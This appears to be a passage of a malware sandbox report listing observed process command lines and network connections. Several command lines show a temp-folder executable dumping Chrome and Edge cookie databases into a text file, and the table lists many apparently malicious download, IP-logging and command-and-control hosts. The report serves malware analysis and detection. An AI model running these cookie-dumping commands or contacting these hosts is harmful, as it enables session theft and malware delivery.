"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6688 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0xdc,0x108,0x104,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xe0,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe4,0x118,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 20.73.194.208:443 | | tcp |
| N/A | 40.126.31.8:443 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.97.97:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 20.189.118.208:80 | | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.237:80 | | tcp |
| N/A | 127.0.0.1:5985 | | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 52.219.64.23:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 52.219.64.23:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 195.2.78.163:25450 | | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.64.127:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.62.52:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.21.79.144:443 | a.goatgame.co | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 52.219.62.123:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.219.62.123:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.18.20.226:80 | crl.globalsign.com | tcp |
| N/A | 8.8.8.8:53 | readinglistforaugust3.xyz | udp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.156.42:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.156.42:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 8.8.8.8:53 | connectini.net | udp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 8.8.8.8:53 | perfect-request-smart.com | udp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
